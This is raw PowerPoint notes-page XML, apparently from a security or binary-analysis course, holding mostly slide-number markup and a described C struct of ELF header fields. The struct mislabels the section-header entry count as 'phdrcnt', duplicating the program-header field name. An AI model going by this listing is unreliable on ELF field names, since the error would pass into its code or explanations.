          <p:cNvPr id="123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45A2A-0773-5F43-BF0F-86D7707AC903}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>222</a:t>
            </a:fld>
            <a:endParaRPr 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30F36-5AFA-A64D-B224-CC3F763AE386}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>227</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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E0BBC0-E44C-A440-963D-0C6AED8A9A4B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>229</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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CVEs</a:t>
            </a:r>
          </a:p>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208279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85A03-163E-1E4C-8C68-36E8EC5C6F82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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B5CB9E-6733-0B47-B84D-F59E3D4DA6AF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99635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635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a:t>PROGRAM HEADER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> TABLE -&gt; Segments = how the program is loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>SECTION HEADER TABLE -&gt; Sections = how the program is viewed by the compiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char magic[4] = ”\177ELF"; // magic number  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char class; // address size, 1 = 32 bit, 2 = 64 bit  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>byteorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // 1 = little-endian, 2 = big-endian  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>hversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // header version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>char pad[9]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // file type: 1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, 2 = executable,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>                      // 3 = shared object, 4 = core image  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>archtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // 2 = SPARC, 3 = x86, 4 = 68K, etc.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>fversion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // file version, always 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> entry; // entry point if executable  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>phdrpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // file position of program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>shdrpos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // file position of section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> flags; // architecture specific flags, usually 0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>hdrsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // size of this ELF header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>phdrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // size of an entry in program header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>phdrcnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // number of entries in program header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>shdrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // size of an entry in section header  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>phdrcnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // number of entries in section header or 0  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1574"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>strsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>; // section number that contains section name strings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3E194-9CD8-5141-A084-FACF5FE3CE7A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr 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481D4-4C3B-774A-9C43-56765108CB42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>57</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CVE for this attack</a:t>
            </a:r>
          </a:p>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1752419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52140-418B-B94E-A94B-24468F1C4D8A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr 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21A61-84E2-0240-BA67-5A5A0E89159B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>59</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61</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62</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63</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64</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65</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66</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94DB0-638B-B14B-AA4D-B1DCA135860E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr 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FD688-6B2C-5049-9211-A6DB3E582AA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</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836703-E882-D0A9-52A4-72274D4A7862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2DCA993D-FE40-3D44-A9CC-C63C3C42EC08}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>14</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48EDD-1C0A-384D-B172-B3B742C536A2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70</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34BB8-1AA3-BD46-9E1E-719BB9FEA8D5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>71</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2592A-B447-4747-B2BF-056FA96C4987}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>73</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dirty="0">
              <a:latin typeface="Courier"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3103E-C536-BD4D-957E-75B82238F79F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>74</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dirty="0">
              <a:latin typeface="Courier"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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>75</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5AC8D-9B62-EB46-9CE8-9B97C36C024C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>76</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86140-69C3-1B44-826E-CCA85F4571A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98816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816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3F6CC-BDA7-5849-B051-4FC9E1F05E80}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99021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02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B2685-FEF1-374B-9902-D4F819BA3E9F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>80</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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37240773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88DB4-BDA2-4141-BEF0-0CD57FD98EAD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>81</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17D10-B7FB-8C4A-B1D7-8EFFED1C30F9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99225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225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4BE3C8-9F72-6D44-A7A1-0A50BBDE42EF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>89</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F2EAA3-B90B-3540-B74E-FE7D42A3FF5B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9861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61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D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>100</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D1A39-98F2-8A4C-B616-4A88B9D6E6CA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>101</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729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C0C6E-92FD-E543-A864-B05FD6DAFA38}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>102</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82175-7BFF-F841-B28D-EFE94774ECA7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>103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70919A-7999-1344-A77D-8550F76A0C90}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>104</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5C90E-F172-ED4A-9B27-405EC72B29A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>105</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ADE6FD-D505-BAD1-2DE3-B026272AC818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DB529684-9BA0-A74B-B4E8-5B2E957BAC6B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>16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A232C-859C-7944-BBC3-4E45C70EADFE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>106</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511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>107</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511EB-C2F5-A145-B335-3AB86E8010F6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>108</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E3C41-3C8B-EF42-AF77-9C12A39B27A4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>109</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72A84-28AB-2B43-A731-AEF84347F9A5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>110</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45D5D-2BBA-8A4E-8E78-F565E6258773}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>111</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398F7-9886-A24A-B54B-F2557141BB12}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>112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03813-D702-BB4A-B638-1BA09FD384A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>113</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E9ADA-6DDB-C64B-B72A-FA59CB99A8E2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>114</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3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>115</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E2C82B-3E14-0146-F276-F41B472FF8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F487836C-512E-344E-9734-04E7DB31FCC1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678914" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F23996-D547-204D-2B71-5869E3DB4271}"/>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784BBE29-02A6-3B0E-ACAA-997966BDAC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B02CC-343D-4748-B305-63171A21896A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>116</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3A278-5DD2-8042-B4E4-70459F0B728B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>117</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6F2D-A3A4-C746-B822-03656D89F2BB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>118</a:t>
            </a:fld>
            <a:endParaRPr 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2E3B3-851D-104F-B830-91D2A6B0ABBA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>119</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3B073-1E93-A848-867E-A6AEEA45BEF7}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>120</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4099EF-3E8D-9742-97F2-E1FA441544DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>121</a:t>
            </a:fld>
            <a:endParaRPr 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0765F-90AA-EE46-823F-EF56F43F7D5E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>122</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87EA4-CF58-2548-9D06-DF6C0F92DD82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>123</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FE306-3D2A-7F41-A8B4-88703AD29F91}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>124</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E9F72-5832-AC4E-9B9A-D5D0A3C27AAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>125</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3B87E9A-786A-1E4C-9343-694BBFBBC8F0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16923299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C448C-EBE3-A748-8B07-26D8A1E1B25E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>126</a:t>
            </a:fld>
            <a:endParaRPr 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B8230A-98A7-B845-87F5-04EFF948CE46}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>127</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48129-E60A-ED49-BD6F-F910058D55DC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr 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F2342-7D86-474E-903B-2BF470BF4B50}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109875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9875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0F9EE-ABF9-A140-BB1E-40D304745E47}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110080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080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67B9D-9264-1947-AAD4-03521D348AF1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110285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285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989057-93FD-4748-92C7-3F80CD4C490C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>133</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110489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489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FF4A43-03A1-884B-83B1-FFFDBE2DF729}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110694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694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57F10-BFF4-5A47-B5D6-A8A176209894}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>136</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315F9-C31A-624A-9D47-E238F8E3A613}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>137</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83A21-1A9A-594A-986F-08077ACB5965}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr 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50706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1631D-F779-1B47-BD13-B0E0DFECE375}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>139</a:t>
            </a:fld>
            <a:endParaRPr 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60457-7160-5149-AD8A-7CCE165DFA80}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>140</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5E9AB-E120-0F49-A091-50F81B09CB24}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122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57D3A-5C9C-4249-AAC6-3EF462A4DE19}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123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B691D-35A2-F946-A6E3-133115CC8A10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
